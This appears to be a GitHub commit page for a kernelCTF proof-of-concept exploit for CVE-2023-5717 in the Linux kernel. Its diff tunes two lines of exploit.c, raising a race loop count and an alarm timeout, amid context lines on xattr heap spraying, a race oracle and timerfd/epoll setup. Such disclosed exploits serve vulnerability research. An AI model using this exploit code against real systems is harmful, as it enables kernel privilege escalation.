We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent e609b89 commit 475154fCopy full SHA for 475154f
pocs/linux/kernelctf/CVE-2023-5717_mitigation/exploit/mitigation-v3b-6.1.55/exploit
0 Bytes
pocs/linux/kernelctf/CVE-2023-5717_mitigation/exploit/mitigation-v3b-6.1.55/exploit.c
@@ -329,7 +329,7 @@ void race(int group_leader) { // caller must have ownership of the group
329
write(pipefd[1], buffer, 1); // sync point A
330
remove_xattr("security.x12296_10", 1);
331
// x10 reclaimed by CPU_B is now released on CPU_A
332
- for (int _=0; _<1; _++) {
+ for (int _=0; _<32; _++) {
333
read(group_leader, buf, sizeof(buf));
334
}
335
sched_yield();
@@ -709,7 +709,7 @@ int main(void) {
709
race_oracle();
710
tfd = timerfd_create(CLOCK_MONOTONIC, 0);
711
do_epoll_enqueue(tfd);
712
- alarm(60*20);
+ alarm(60*30);
713
spray_xattr_page(0x3000, 2048, 0);
714
715
exploit();
0 commit comments